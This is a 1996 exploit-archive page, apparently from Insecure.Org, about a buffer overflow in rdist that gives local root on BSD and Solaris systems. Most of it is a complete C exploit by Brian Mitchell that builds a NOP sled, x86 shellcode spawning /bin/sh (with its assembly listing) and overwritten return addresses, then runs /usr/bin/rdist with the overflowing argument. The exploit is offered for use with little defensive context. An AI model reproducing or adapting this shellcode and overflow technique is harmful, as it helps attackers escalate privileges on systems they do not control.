Rdist buffer overrun (BSD Code)

Summary

Description:	Another vulnerability in rdist, standard buffer overflow
Author:	found in [8lgm]-Advisory-26.UNIX.rdist.20-3-1996, *BSD exploit written by Brian Mitchell (brian@saturn.net)
Compromise:	root (local)
Vulnerable Systems:	Solaris 2.x, Sunos 4., some BSD systems. Included exploit only for *BSD.
Date:	10 July 1996

Details

Exploit:


From: Brian Mitchell (brian@saturn.net)
Date: Wed, 10 Jul 1996 00:09:26 -0400 


Here is a quick bsd/os (should work in freebsd too, I believe) exploitation
script for the rdist buffer overflow vulnerbility. It's a shame 8lgm
doesnt release code anymore, I'd like to see some sparc asm code for this
sort of thing .

/* cut here */
#include 
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             256

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

main(int argc, char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

/* so you dont have to disassemble it, here is the asm code:
start:
jmp     endofk0dez
realstart:
popl    %esi
leal    (%esi), %ebx
movl    %ebx, 0x0b(%esi)
xorl    %edx, %edx
movl    %edx, 7(%esi)
movl    %edx, 0x0f(%esi)
movl    %edx, 0x14(%esi)
movb    %edx, 0x19(%esi)
xorl    %eax, %eax
movb    $59, %al
leal    0x0b(%esi), %ecx
movl    %ecx, %edx
pushl   %edx
pushl   %ecx
pushl   %ebx
pushl   %eax
jmp     bewm
endofk0dez:
call    realstart
.byte   '/', 'b', 'i', 'n', '/', 's', 'h'
.byte   1, 1, 1, 1
.byte   2, 2, 2, 2
.byte   3, 3, 3, 3
bewm:
.byte   0x9a, 4, 4, 4, 4, 7, 4
*/

   char execshell[] =
   "\xeb\x23"
   "\x5e"
   "\x8d\x1e"
   "\x89\x5e\x0b"
   "\x31\xd2"
   "\x89\x56\x07"
   "\x89\x56\x0f"
   "\x89\x56\x14"
   "\x88\x56\x19"
   "\x31\xc0"
   "\xb0\x3b"
   "\x8d\x4e\x0b"
   "\x89\xca"
   "\x52"
   "\x51"
   "\x53"
   "\x50"
   "\xeb\x18"
   "\xe8\xd8\xff\xff\xff"
   "/bin/sh"
   "\x01\x01\x01\x01"
   "\x02\x02\x02\x02"
   "\x03\x03\x03\x03"
   "\x9a\x04\x04\x04\x04\x07\x04";

   int i;
   int ofs = DEFAULT_OFFSET;

   /* if we have a argument, use it as offset, else use default */
   if(argc == 2)
      ofs = atoi(argv[1]);
   /* print the offset in use */
   printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   /* fill start of buffer with nops */
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   /* stick asm code into the buffer */
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   /* write the return addresses
   **
   ** return address                            4
   ** ebp                                       4
   ** register unsigned n                       0
   ** register char *cp                         0
   ** register struct syment *s                 0
   **
   ** total: 8
   */
   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/rdist", "rdist", "-d", buff, "-d", buff, NULL);
}
/* cut here */

Brian Mitchell                                          brian@saturn.net
"I never give them hell. I just tell the truth and they think it's hell"
- H. Truman

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: